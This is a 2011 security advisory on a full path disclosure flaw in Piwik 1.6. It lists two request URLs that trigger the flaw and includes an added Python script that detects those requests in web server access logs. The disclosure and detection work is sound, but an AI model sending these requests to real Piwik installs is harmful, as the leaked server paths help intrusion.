SSCHADV2011-032 - Piwik 1.6 Full Path Disclosure
Advisory: Piwik 1.6 Full Path Disclosure
Advisory ID: SSCHADV2011-032
Author: Stefan Schurtz
Affected Software: Successfully tested on Piwik 1.6
Vendor URL:
Vendor Status: informed but no fix available
CVE-ID: -
======================
Vulnerability Description:
======================
Piwik 1.6 is prone to a Full Path Disclosure vulnerability.
==============
Technical Details:
==============
http://<target>/piwik/?module=VisitsSummary&action=getEvolutionGraph&idSite=&period=day
http://<target>/piwik/index.php?module=LanguagesManager&action=saveLanguage
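For defenders, the two request shapes above can be searched for in web server access logs. The following is an added example, not part of the original advisory or of Piwik; the combined log format, the function names, the GET-only rule for saveLanguage and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def matches_advisory(method, target):
    """Return a label if the request has the shape of one of the two advisory URLs."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    module = query.get("module", [""])[0]
    action = query.get("action", [""])[0]
    if module == "VisitsSummary" and action == "getEvolutionGraph":
        # The advisory URL carries an empty idSite; a missing one is treated the same.
        if query.get("idSite", [""])[0].strip() == "":
            return "VisitsSummary.getEvolutionGraph with empty idSite"
    if module == "LanguagesManager" and action == "saveLanguage":
        # The advisory URL has no parameters besides module and action.
        # Assumption: only GET is judged, since a POST body is not in the access log.
        if method == "GET" and set(query) <= {"module", "action"}:
            return "LanguagesManager.saveLanguage without further parameters"
    return None

def scan(lines):
    """Yield (line_number, client, label) for log lines matching the advisory."""
    for number, line in enumerate(lines, start=1):
        found = REQUEST_RE.search(line)
        if not found:
            continue
        label = matches_advisory(found.group("method"), found.group("target"))
        if label:
            yield number, line.split(" ", 1)[0], label

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2011:10:00:01 +0200] "GET /piwik/?module=VisitsSummary'
    '&action=getEvolutionGraph&idSite=&period=day HTTP/1.1" 200 512',
    '192.0.2.11 - - [19/Oct/2011:10:00:05 +0200] "GET /piwik/?module=VisitsSummary'
    '&action=getEvolutionGraph&idSite=1&period=day HTTP/1.1" 200 2048',
    '192.0.2.10 - - [19/Oct/2011:10:00:09 +0200] "GET /piwik/index.php'
    '?module=LanguagesManager&action=saveLanguage HTTP/1.1" 200 498',
    '192.0.2.12 - - [19/Oct/2011:10:00:12 +0200] "GET /piwik/index.php'
    '?module=CoreHome&action=index&idSite=1 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A match only shows that a request had the same shape as the advisory URLs; whether a path was actually returned depends on the server's error output.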
=====
Solution:
=====
no fix available!
================
Disclosure Timeline:
================
19-Oct-2011 – informed developers
19-Oct-2011 – response from vendor -> no fix
19-Oct-2011 – release date of this security advisory
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://piwik.org/
http://www.rul3z.de/advisories/SSCHADV2011-032.txt